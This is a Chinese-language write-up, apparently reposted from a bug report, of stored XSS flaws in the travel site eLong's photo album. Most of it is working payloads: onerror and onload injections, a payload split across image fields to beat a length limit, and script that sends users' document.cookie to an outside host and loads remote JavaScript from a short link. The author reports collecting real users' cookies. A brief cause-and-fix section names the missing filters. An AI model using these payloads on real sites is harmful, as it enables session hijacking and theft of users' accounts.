好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

艺龙多处存储型XSS 突破长度限制(原理利用及修复

各种XSS 详细说明:1. [><img src=1 onerror=alert(1);> 1) 位置: a) 相册

  b) 转发

  b) 转发

c) 编辑名称

 

2) 利用 利用起来非常简单,前两个直接看了就被X, 后面那个一个我们抓了一下包:

 

上面的几个都非常清晰明了的出现在了网页中,直接CSRF修改subject,不论是自己还是别人,各种被跨。 2. [ onload=]alert(1)]

 

1) 位置 a) 直接在相册页面被X

 

b) 跑到编辑图片里面被X

 

2) 利用 同样方便,方法一:直接X;方法二:CSRFX 当然还有更方便的[突破长度限制跨艺龙妹子]。

3. ‘;alert(document.cookie);//

 

1) 位置 a) 外面:在相册里面看照片

   

b) 里面:点进去看照片

 

2) 利用 最直接,一看就X 4. 突破长度限制跨艺龙妹子! 上面说了这么多,但是有个问题,最多只能输入30个字母,想要跨到艺龙妹子,必须突破长度限制才可以。我们可以利用几种XSS配合突破长度限制。 我们的跨站代码是

http://kocteg.duapp测试数据/a.php?v=elong&c=’document.cookie’ 由于长度限制,我们无法使用这个跨站代码。那么就有下面这个办法,将其拆分 1:] onload=]g=document.cookie] 2:] onload=]h=’http://kocteg’] 3:] onload=]h=h+’.duapp测试数据/a.’] 4:] onload=]h=h+’php?v=elong&c’] 5:] onload=]h=h+’=’+g] 6:’; windows .open(h);// 分别放到每个图片里面去

 

只要妹子一点开这个相册,就被跨了。。。。

 

收到两条。。。因为duapp设置了啥啥啥,导致IP地址获取不到。。。 5. 原理及修复 1) 第一个:[><img src=1 onerror=alert(1);>

 

[和>木有过滤

2) 第二个:[ onload=]alert(1)]

 

[木有过滤 3) 第三个:‘;alert(document.cookie);//

 

调用后单引号木有过滤

之前因为elong过滤了尖括号<>和script关键字,一直不能加载JS,只是通过GET传COOKIE而已,今天早上起来测试了一下成功绕过并加载JS 获得原来超过URL限制不能GET到的超长COOKIE  

<script/src=http://t.cn/zWEGaNi></script> 上面为加载JS的代码。拆分成

" onload="h='&lt;scr' " onload="h+='ipt/src=h' " onload="h+='ttp://t.cn/zWEG' " onload="h+='aNi&gt;&lt;/scr' " onload="h+='ipt&gt;' " onload="document.write(h); 服务器端过滤了<>和script但是客户端并没有。&lt;顺利通过了服务器端通过JS变成了<然后被document.write打印了出来。以下就是获得的超长COOKIE

 

查看更多关于艺龙多处存储型XSS 突破长度限制(原理利用及修复的详细内容...

  阅读:51次